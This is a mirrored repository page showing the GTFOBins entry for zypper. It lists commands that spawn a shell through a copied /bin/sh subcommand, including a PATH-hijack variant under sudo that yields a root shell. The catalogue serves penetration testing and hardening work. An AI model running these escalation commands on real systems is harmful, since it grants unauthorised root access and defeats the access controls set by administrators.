This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-05 03:08:35 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
2e55528e82f9c174c2a1de4a9422fcf46f828a53
GTFOBins.github.io
/
_gtfobins
/
zypper.md
the-remmer
8c03983ab8
Add zypper
...
Close
#52
.
2019-02-22 12:51:30 +01:00
629 B
Raw
Blame
History
functions
functions
shell
sudo
description
code
This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
zypper x
code
TF=$(mktemp -d) cp /bin/sh $TF/zypper-x export PATH=$TF:$PATH zypper x
description
code
This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
sudo zypper x
code
TF=$(mktemp -d) cp /bin/sh $TF/zypper-x export PATH=$TF:$PATH sudo -E zypper x
Reference in New Issue
View Git Blame
Copy Permalink